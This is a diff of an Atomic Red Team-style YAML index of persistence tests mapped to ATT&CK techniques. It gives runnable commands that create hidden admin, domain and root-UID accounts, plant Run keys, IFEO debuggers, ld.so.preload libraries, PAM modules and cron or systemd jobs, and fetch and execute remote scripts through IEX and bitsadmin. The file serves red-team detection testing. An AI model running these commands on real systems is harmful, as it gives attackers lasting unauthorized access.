persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic - ' +' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds 
@@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: 
@@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. - ' +' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time - ' +' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: 'cat ~/.aws/credentials | grep "default" - ' +' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: 'aws iam create-user --user-name #{username} - ' +' cleanup_command: 'aws iam delete-user --user-name #{username} - ' +' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: 
@@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: 
@@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain - ' +' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User - ' +' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" - ' +' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: 
@@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true 
@@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create a new user in PowerShell 
@@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1556.004: technique: 
@@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" - ' +' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 - ' +' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f - ' +' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 - ' +' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce 
@@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; - ' +' cleanup_command: 'unset ssh_authorized_keys - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 
@@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: 